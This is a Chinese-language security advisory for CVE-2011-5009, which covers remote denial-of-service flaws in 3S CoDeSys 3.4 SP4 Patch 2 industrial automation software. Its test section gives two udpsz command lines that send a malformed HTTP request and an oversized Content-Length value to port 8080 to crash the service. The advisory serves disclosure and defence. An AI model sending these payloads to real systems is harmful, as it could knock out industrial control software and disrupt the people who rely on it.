发布日期：2011-11-30
更新日期：2011-12-05

受影响系统：

3S GmbH CoDeSys 3.4 SP4 Patch 2

描述：

---

BUGTRAQ  ID: 50854
CVE(CAN) ID: CVE-2011-5009

CoDeSys Automation Suite是工业自动化技术综合软件工具。

CoDeSys在实现上存在多个远程拒绝服务漏洞，远程攻击者可利用此漏洞使应用程序崩溃，拒绝服务合法用户。

<*来源：Luigi Auriemma （aluigi@pivx.com）
  
  链接：http://aluigi.altervista.org/adv/codesys_1-adv.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1

udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1

建议：

---

厂商补丁：

3S
--
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.3s-software.com/index.shtml?en_CoDeSysV3_en

浏览次数：2160
严重程度：0（网友投票）